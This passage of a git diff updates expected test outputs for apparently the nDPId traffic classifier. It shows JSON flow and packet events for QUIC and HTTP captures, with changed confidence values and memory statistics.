RXsSKcvSfS7LMOOa1iFP74PK9pOe2d+Kge3D10pHw5xvRBL5wIChQyBfmTPUKrK4rHXy82eTRRhTBKuJrbMv9T7XFHN5+H3chAvLWlrpV658DsehpWG\/heFld+bt39EMFPxrvugSLVNfbLvCnkIUyoImjdqvVj6Rx4k6hbJcFfYuU3ax\/j1wXJ1Aar7aVQydz+BiB9Fxk+eH\/qMFSF3ir3mKdIaHP3IUZOdgUkuG2UC5wWlc3438o4bvtGZ3nwifkZhkqJ0KdMIpJExGa\/AQl+d8cNAdSXLXM+DYjJis3nf2FGSiavtkGQ5gse3JeXrzKJFFtk6jcssK9h2Puqhq4IBMocJAfXnRMW\/OZ1jK+viEJjEu86fhopk0fDPB9DnWqNLuhKZbRPvi0CVdVKcq0vHFC\/pj2+NAI0Ops+2nN5yMrR4A6l\/8BcNYUJAtdstA\/Mmp+wdC\/G0p788zz8X\/NLPDa5WBeMhDBZktdXbl9oAq8mg52ggTdaTmm2jXqGKfzHqW5MClayMT0zXTwUHpjyayemAociOoR3pCM\/XoR3ULfnBs5UXukbBcD\/hcJKZpQZl3FeAMsaWvdZIbB62LlhdQiQ9E00tTktJnwHVhmpIGEmHx79qHujB4QnvSRf7rGMoi+J2+2yEf+pyZjFhJ7Vn0wek\/6YlXTjpXTJrPxdQiAfgtbMdrh0tGyM1aWelixaAL3fMRVQAbarGMmZNeVHObrG\/XRHUKe9QBmB0f2ucnxL\/Q5nZRz7iz\/WLt+LDVk7cJtCKxbiwTn6eNjrz\/eeO\/RDUWtAmn\/N2MrSP3BX63IBecgggeajGeDQeu0h0gzpQwmmr1W\/rYunSoqFFX5ouz8a\/O56eupxDBH4dlgKCLpB\/uNcGBsZbZn7D0MSdEq9sU+3rGh6ZCpDREqoFoM\/ePe6ZBwYyN5DfQ5S5xtM5Kx9nzgR0ma7na5nF+l+ByRUVDDcg+R6gDDtX7u7VAfvqTRqMCFrc
yF0SqjD73Dx+5jJbDcuF3krsh5cUsmC3ty8BDoVGSf11axnldbf8\/lHSYOw4ulZJKq\/sTz5UxTVW5laCNJjqlY7Z8a7ZX\/gPYZni6DK3sKH\/pwfLD+eJvhi5gUZcI6y+TKOWHX3m7F7jI+o6kmuivTUhAHO0tp8eeKahEg274V6OXbr5gKp+A0ojgsX7ZyT\/qEOZyQW+ZVLpcoLdNi4viDD0P3Ti\/0+eMAJFCD83SXHZE7s3ktIEr1gJA+f8pz2foQ3UUo5VMFxosbOpW130fJlD\/iAqO7lnIbBAljSuAijWA4Tsc5zdOymoeY9QwWVkg13iiuc7J90lC+Sy8otpTVHsB262zMGncSESaXB5zznflxo7CBcJpN5BfwnB6hHSOc+uG"} 02270{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1598618820678,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598618820678,"pkt":"AAAAAAAAAAEA4e3RCABFAAViAABAADURNGem8LzRKJp\/yAG7wqwFTgvc71QwNTAACFVfMtNfKdhjRTVAGOq\/R1tSJ490cCgCIJtMuLgnF7hKWcwUWGCG1yeUQra8M2IbabEbv3t9rDs1mKoSxG0o1SwNZg+TYNjx60XPnxlQjdaPemBfWHhyIShS\/FwerrScOvQMg46Oklvwr2FyLIMnAlNL\/mWc7+8747IMQbAPr5vlwnAdmo2qfZtYMtdIW1xhXCBxR7JJFwiBMgxW++zHicn7moaT8\/+bDZ+HzEepJeBYrSVteiS0BK0n6cCyVowGk\/PbfkfkASgXD5BG61Cd+nr8Af7qfQdcKurj0yyrH5h1viElvy4SUonTnuNRTXgRmkWFI5Dx655anVNEDyyIA+LInCwiGE39JR+co6yzHCype7nL72Nq+jikfQUPfI883b5MrQ9rngGiZ8\/Xj8lYP\/QZ3\/ogby7k8+EqRcwwLdrKtF5JCPQHA47uMBlHe04rS8i00HZ6nSli4gEiz6jamp06cf0n39bZgvUQjAKf0ERdv971hRGdG0miD7H3QBKDkYd3jMMaCW0xLn2JbaBK1oc8XsPcVUeGlwQmCRwBHHJ8Zi5U2cVPlHrY4uUezGQwo3VZ3r5q95rt435Cj51jZ28FqxsNIE11PMXbcj4IXggGlyQVSDdlQV8ySpernoTOLJ7ESEF3t54ex\/kmX4c4cMPX9ddsiAY5den0AJP0\/NiKWL3LrUSrEOm8wr\/TSwK8v7YyoUXFr0q9WzgNo3XQrwUtAlQBmFb24DGYwbS+3XNGulanTnYpBrsb5c1rh0p91mAhQ\/rpURoxrNHqQru2XnDOVB85T41pLYZBM1fI2jpefgEQe9S28IEB\/1eLwrRuiU\/FIh6zJnowpUGRMkPEcli\/a9qk4i1KUhncByKhdd\/9ipm3FA0L0wwJh9k7FyhUMixNB17ijKhZ9gdil7oXiNMdx124Nmzbbk5lrjKivTcJ9RPINOAPRUQFR1RdL0N6Kq0CLXSzCDdZdLrY9En+mVKeYQj0xo\/jR18exhwt\/eRGfcgKxU3vj0n7pPV2efcnGnYI\/qnwevG1XcNdzUDvV4mVcXNvYEPxKSNdhD7Gpk6sGnaPSQTI2HNf0HmdlyCkLZSrpVeHOY4fveiP4Adr8M05Zxd0p3+8DcvQwP4QYKb25
58+ox1mWrMBcDoH8rfM8Obyh3XuvPIl+jImNEF6BP6N3059LnOdatU9xWrsdLNJEgvG9u60Lk7nUNGZtXy46J65s6wF0c50NT+RmqoC2LZher4uoex39pj1K8V7kaJv3pcV1GjZn7eaJfrytSHHD08EAQGGAMIFMRg6nHfi8XeYIO3oF5hSYGXvUcdNd7WIgnidI\/Dzin6YMvkS0sgovzeBscolAktAP7weC3mq1LIaKYgNt2UsL8d9KL8\/n8B6R\/Yt81QFXYZf8g3+P4tPy\/kkSsNIfvswl3y0LDlhheLGqrpmqC8lIBGwv8YQXlaspfmVjHdirPP2SwJhDXPOI7i0j92jF26bcCvOi\/MymU9+Eb7WBD7jBktqD9MQhYDPOR1XZV0o4Os8ysZy\/WuU9JD6fru3jsr\/kKCqPguqlfF+W\/br9kviTd3\/eB4VY8p+7Zw2IhUhbAAnr8CvfrB2S\/TOapOVIXCtl3VT4kPt7qxNllSaLAB7HZ0kifbilO2MEKf7JHrUnpsA6AJyeHwuLS7wsXBPwyB\/OuLAVAq7ZLX3Aej45laD+jKQmWnX35iCvC2Lk0iNpz0KaPylARDD4R6xtjFuUiuuiD+\/VDor8Z42laVln8rezBVKWbgIJ0+RzyJkUTKFz9D8WmujYRQ1"} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1598618820564,"flow_last_seen":1598618820984,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7916,"flow_avg_l4_payload_len":659,"midstream":0,"thread_ts_msec":1598618820984,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1598618820564,"flow_last_seen":1598618820984,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7916,"flow_avg_l4_payload_len":659,"midstream":0,"thread_ts_msec":1598618820984,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"quic_t50.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":7916,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1598618820984} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/12 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880171 bytes -~~ total memory freed........: 5880171 bytes -~~ total allocations/frees...: 118148/118148 +~~ total memory allocated....: 6013805 bytes +~~ total memory freed........: 6013805 bytes +~~ total allocations/frees...: 120910/120910 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2279 chars diff --git a/test/results/quic_t51.pcap.out b/test/results/quic_t51.pcap.out index 27ae5652a..fd73781b5 100644 --- a/test/results/quic_t51.pcap.out +++ b/test/results/quic_t51.pcap.out 
@@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1598620434413} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598620434413,"flow_last_seen":1598620434413,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598620434413,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02260{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1598620434413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598620434413,"pkt":"AAAAAAAAAAgAH83gCABFAAViXjpAAH8R7IK744iY0\/eTWtg8AbsFTvswwVQwNTEI\/5QVtbAFhg0AAEU0lc1seKsogM0xJ2my4Aiqph+R\/2N2Tlopv6L1CTJ74mgIopdeTMsbdYmmZHP80OXizzota6YFHVZ9VeAcEZo8pgEgiYZUg70bNed022uBY2n4AIBJaoTaZc4dlK\/B4TiUFC+WiYMdxcvH3S2VlmhK+Rc2gUQHqAYLkzqvz5M6NYLldilKxcCw\/ToJ+zu5fHTAbQipFFqbD95GLa7oBCU7jPE\/wj2QE1M9Wk52+SrgbNiKCHm0Oi8\/\/aC+8QR8oPQVWsQzjkcyagMWDaycHo+Z2gh2YqGCJoepFNsqgtO8uWWNDiaisHNHQDCPrCt5EDVvLMLkZZQTcE9bxIhJucB4CNr926kRAjaB4Y5CqDAEear5TtCJ3Iu0C2bzBjoi5J9LPiwVBQYhfxtqGdX9O3nANKjdbMVqvYl742MGo2YFm2J507oPMBXLqPJW2a2j\/XlrdIcqLJLXy1ruiet2Yfof5cTaMXQp6wyOq8s2kLEeb0RqG380zHAhUvwTfCiEYvwSN8+LPb7d1HKu3JRvbfM4A2u6D3\/ccc40B8jpt6t8mVTCa92M7s8hgVfDHCvoiaTxRF07ULZWTbuRFjLXA3G\/QLzl0b2QQA3PRqMO1r4YLM9IhL+9TjIm9kskk81nFsbcqeUPPCIl5SvakooZ1Ne4vlHJM7vcPwHkRJHa+PMjtknf1D9FmcaRoK2gywFTRk2j2RKXeNNGP3fOGBMRmVstntMO9HlCQR0pqWkIJ+jw+vDqFHMVZBwco3px5tJKsYik1W4I7vDVokn8tYkCXuWkDqmw9KvnktOeNU+eoLbnbQi\/AJnaCX22\/pOnvMBDUqcAEyxhhPUDxacTTuyCy01g9D7qNJmAhz3k5MC2zTm67IILY1heZ2AuYvQwYQOss3bJtjPNa+uV1pVbQiVw6S2nvxKgtq5Z9DSuXhvsbTOp5GSq1YV0eewMUT6nB6ejScFWGv+XM50Rf10iuSgO6pXznyY29qMMOcdfxFMWk8ZhEALkKLXeqjM+FjHgPqVYhtjd0Mxa3xCi4pEnff1YF4nj78KYHZrV2zxl6ihclVVh4iHXNFGI+s63vsFXEOTBejfPsr6+VmTDJ1+o1kNk93XUE\/bQ82a18NJPdXQ6kf26Qjcc4RqnTvAmrWh\/6fmG4zIriY7A9z8t4eO9Qfr9TLO3k0B5JOVnWVTqlbOvrJgEzV95Hv0ioO0xIj5BnxrbLnlwbNfPjVGTcRNAh71gU32J8rr6rCxxCaTv4RU7KdiQ+zigC0LKK7x4OPs9n2Ka2KUPy25mrLQ\/hk5IjtzsrqqQ2MzNcZhxb0kkNCxELzOQUMbpkFnw3XGvEDCJVplyR1UqjiDFOL8\/JfuephE1oyHWeOYVwVd2Cwv2PGGx05T5JJWiwFxWUNPRdBpTvDS0w\/p4Nd\/c2GPaorYCv1rEFAbYJpF4F6I30H8WeSXKzzhCDJKK0+cDwsUjqsSRJxU4ftS+uYB0XeJmKhKFuSfMEVI0q1YpMQZE\/G2MC4zAighNsEoU
wNwWYS2545Iu3+Eegoe47B\/k8tCSheavZoHCQ6GLnzYKEdctMGvZqMVOXsPQnYlobmVfhCoHYAqTL++rI+V2XgKmzpdEDycwwsSLkVWoYU4lGAoPMP3kxasfCnUHU\/V6gkc7C3bskka9cplZd3pC0DtI8Ams8W1VIknYpHJDhbirGSRTc6oJbJQK8NbF0mBg+7QAzF7Cg20VSPH1oCq1EEodwhHlQBTHEkDIUOOWm8A2kePv2bx2BTxVuCDz2D78zh51"} -00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598620434413,"flow_last_seen":1598620434413,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598620434413,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/86.0.4240.9 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-T051","ja3":"92e76078d514999cd950474995dab2b5","tls_supported_versions":"TLSv1.3"}} +00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598620434413,"flow_last_seen":1598620434413,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598620434413,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/86.0.4240.9 Windows NT 6.1; Win64; 
x64","version":"TLSv1.3","alpn":"h3-T051","ja3":"92e76078d514999cd950474995dab2b5","tls_supported_versions":"TLSv1.3"}} 02266{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1598620434419,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598620434419,"pkt":"AAAAAAAAAAIA\/tPQCABFAAViAABAADcRkr3T95Nau+OImAG72DwFTvx1wFQwNTEACP+UFbWwBYYNAEU0cA7ob5DRu6SNsqDMEz7qri8UnfijZV8Hhw\/oxky0x+Zt0s6erWm7kWn2+1owrYTdI9p89OpW\/6ptpwv9v0J5BjJyyLuuQ7qMgzGXDs2ur++juUsUpOdkAs5K5BYVfQAmPmXEGyVgmyCeUg1T7Vj6FslmnDV909IngQqr2X3bAL3as4fB8O0bAq64I2nnjXRSsXtOF+WecFDOIkhsUozc+8M2nJh6kczAN6BO7Q6B24T4pTF7f\/SWotAh0wmioZGWvmsK3tbjrCGONmSc7G6EA+eCMtEUY\/yq8VyKOSmIHald\/L7JGCPyNYCQuoSWiWNaW\/I+iZ2Tm83YJ0ULZZc8urwFDYH3aj1AkglwflqENARW1+\/0Wgf8CdNT18FiabAis+X7vPL\/K0rfVmIy72rlRNRfOG7y7nzx1KwQOQc8aCVF3CWYU+Lmd10cKRMsTRDen+t7CfJT6D6czKmRS9zHy8defw2VL+sr4ea6knMol1lydS5om9MxXCYpqegXuWZiFTSbzJvhE4RaqOqWqlC3CyDO4ySp0wcYRr6Xiz\/ypHsBLBgujZNocUdxB92srmLhWvU+EKXNqnvn4sN9tP\/B4VI81UNJfpKqafd5TbC3xVerPG2FpOE4rg1k2rQi9r6v1+PQ\/d3R0LlFcbJ1hI9fgnNKZUfeIejFNzw84ZCPAGKEZF9DRij\/q7+ynKTHsKprl5SyrzqmDatgR6jPni4YdUIipVxz2xAMDSfgGHJudxWet0g70XvUgRUnZwnINCVHKug\/Cwaar4s1XCM8uhzoEef40bHIf\/1cPPikcn5BGvUj0yq5vKOgKlUAn1Pgd3RmxD4udRVK4hr3Qq2qz0yzGHjPkF5V31PdO+LbljCDil0atM9nNzYRQDTxXIy4ROBhbRF0GC5xxy\/5G1Z3EVEXnUgV7cKAoSoRYsJk+ehBddHi\/2\/aZLTP9GUgaj03e1ZAUqg\/pLbgzkOggtkBYwlEystem00J3RiW59azSXPWDzpQD37GvUqWpvchJjuAPROhp0eQOeyP6Sm5m8Ha1f9MDT\/mDWqN\/iBuFORPOJebKiYDmtBTotFqfXW1txgynw6EHUJzSE+pl4MdTTWGiKeLLjK6VcgkjK3QCvZi2YAV34jHwjHZGw2P\/U6KrMCfYoKLgcta7eGwEJgt1TEOATVA86YdSNrUK8Cm6qplxo7u2vCTdHfHERZHXlWiV5V+M6yg8jJ+w71hYe+9QRnWDWxxhFwqS3Rom5NgfL3qyZPAg7B0TvVcGC3k1t2hVxdIBJT1YLB9P8xcq205KojLAkrnJ6A03YtC2cE+\/GfTI6rrSdcn22uQHH1uwQgPFlvo5F8SRGnmtqbBCoQkhDA10opFpEUHAKVRysF1xT\/NgfiMQHD+An4I
rPRfuv9gDg0rUkwJww22wh5gLlRkZ\/Syy5BClTzH9Eje2q1QlkG4NyNIdxlgTeTWfrV+owYm4Q+FXDFSqiziTTjYt929oBaNekN7DaLZNKBHzE9aRpnZjKaGJOIkilbSRnfMsOP+KhOdyxkYqJB7lgyVuE7zA+Cs6QfiNfeFBdysqGJcMLaCJe1XQZYseYZCHv9I1fYRd7rHJDJ5TLxG9ZoKBvyy9qAFruCnQdJM3kRJUF0ZdxtTsL1YtSrJYqn3hcGRfsN64Wu2ioNCdgwzJ\/IOr225URP0O\/yfvAjNTo393KgekGIplrSAr2vqB7j6oyQmlBJgPRuYDzTKmIMBKNHRY+Gk4U31TV\/ldcN5g5htDYX20DA3i7tEfKzfbUYY"} 02267{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1598620434482,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598620434482,"pkt":"AAAAAAAAAAgAH83gCABFAAViXl9AAH8R7F2744iY0\/eTWtg8AbsFTtamzVQwNTEI\/5QVtbAFhg0AAEU0KsIg8w2st8fMy25uq6gsPA7KRO4wWARaQxn0e+nvMAG\/ncVOK2\/1iV8zM1GT+gj2yfRnYitTLViCwPF0TV0R7p64xnLqwrHTiNaW89JgMAHQze00LP7FiTbOvqpo5S+7AzCO4J36LH8gasnIPNye5ytyGP9hxarM0Gwv6wB1BKIgh6Hfi9vN\/Jaq\/hKaWtnsFyqFx21T1U0YmQzCOhcYGHZNHNGEmxqlfOiET0cy7A2zooythTNQBScefWz4fyugA0KO5z5EPbOCuLPnOhJ8u0jAA5snZ9Av4lfTCNurCTo\/b96gqEMXFCAN6kklskS6mSW1P2yxo93FRN9w3VFPyMe8m7WnAxPUMrijM3bZFrpYXz6N3LoSvj\/7t1mbaz3Ew6W7CCET2\/vUPuty0yYuKN9hlZRGZDAOI7p7UV84zBa3MKUoIB90BBwtqXlv\/AcyfRFhSrAf1TPDIen8IRojBr5qTqwwDIcvMREVIsmeXYDDAIh87njz+3l6UiC0r72z0Vz8KlwPmvyd1tNbK4UoVu5yliqV7BzHAT0P+flRjAVL+Vtw\/1eTO0KLmizThDqycqyAF1MjS6cC4BRlgBDuBvC7oqizuHTk4JOICP+TLa71t9U0MO4SvptmKRFy9UA159ziHHDRbAhIzzVEm+HGxTjT93PUzlkT4beWAgYYW5swcH8m2E+qX\/jfh4l+RAJ7s1FC99eqQD\/G2qHKz49sTvtw3eknSSHiADw1dFNDiGytHeAJqgKsYZ6xbxYgMT8vQQJWpcCaoPnc1R\/36QBSKDfO0Ei6I0Nk2Twp2jW7ybYg3WV9zcO8mcO+t2rUANioNNaghKiQ6\/\/kCvnfaOZl9\/nMaaP8oRI80YNnM3bBLePCUoIodPlfRsS+qRORwVaYVbmTkVd+7OOE68KIf+CtQJzWPG1I9szX6EUokwcVW4JeKB3DLXSgUJqbrCp8nB5Gt1Xl+DVmAWNn0zlmAkUkIYwVaRlUBt12nmZM5GfCFjeNYwyxKhMtco0zqNoFh6GPimEo\/HJoIaculB01PGh4MlKE33m6lcbQnV2mcjQy9+X6G7gJAvssvNVim+h2CyUIa0AFnvBEp0BZ0LQBw4xxW1+LO+851oEKlpBHf2C
aPTJQbQ3lYLcFUbbZ7WxtncvtHzy\/SI9UgKeWcagnCcsYLbPsnPnloEl6cnUj6vnGVoFZ0zI4TVPk88\/biBoFXX37AYSAsISWoXJh5fdyK7Ub3uTshAtqeqBBTUeUFjb5Aj4cdCLyefeqdX7eVX7iolZTDjMHw6WHcQg9j8QT5ZehE6eQ3EWBv\/dyJkxi+P\/\/5RRqzAOol5xZb6h4LuhsvzWHQihAaP9MzFNZJKsrSoe\/spLPEQi09YKZ53xMfFjPTNozP7awNtIb6QltDJNIByFfslEQklWBp3nSDDraHwFBspLwhrXO\/4KJq80I0e6UvL2AGkUJ3WcnYVtrSbxxk4APJ7JesOtrVvfG0zUeYMWMSCdfwkF4KodqZGtJ3QATjzBea+nTD5uHk34dDyJnSJKk0ILq0jIFLho8LlWIyJH4QOXOz4qaWrv1Yq7zohspvZk7qqBfzWtq9nyRWQ1TZln6OTuRj1nSwDkH3Qwyv3P3ftVCIjgLduzJ1KxoPir\/gAp5xz8YWBMXoD3IJzkv\/PGQNpizq54tSdx\/+EwNQ0FXkMrTDVKVITAuSnBIkg9sH6JW+WpNYsbAPv3JnEFyzt8fIeM\/r0Qmf+N6zxgE9jaSg9C2Ue6YSiQO2VAdyYTxTvnFaxwR"} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":642,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":642,"flow_first_seen":1598620434413,"flow_last_seen":1598620524479,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":546754,"flow_avg_l4_payload_len":851,"midstream":0,"thread_ts_msec":1598620524479,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":642,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":642,"flow_first_seen":1598620434413,"flow_last_seen":1598620524479,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":546754,"flow_avg_l4_payload_len":851,"midstream":0,"thread_ts_msec":1598620524479,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":642,"source":"quic_t51.pcap","alias":"nDPId-test","packets-captured":642,"packets-processed":642,"total-skipped-flows":0,"total-l4-payload-len":546754,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1598620524479} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 642/642 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5898444 bytes -~~ total memory freed........: 5898444 bytes -~~ total allocations/frees...: 118778/118778 +~~ total memory allocated....: 6032078 bytes +~~ total memory freed........: 6032078 bytes +~~ total allocations/frees...: 121540/121540 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2272 chars diff --git a/test/results/quickplay.pcap.out b/test/results/quickplay.pcap.out index 59a80f4db..2f190d573 100644 --- a/test/results/quickplay.pcap.out +++ b/test/results/quickplay.pcap.out 
@@ -2,123 +2,122 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1429000030398} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1429000030398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWBDAUAAPwaoIQo2qfp4HCMpxewAUEHDiNf6xwiBUBgAc22rAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG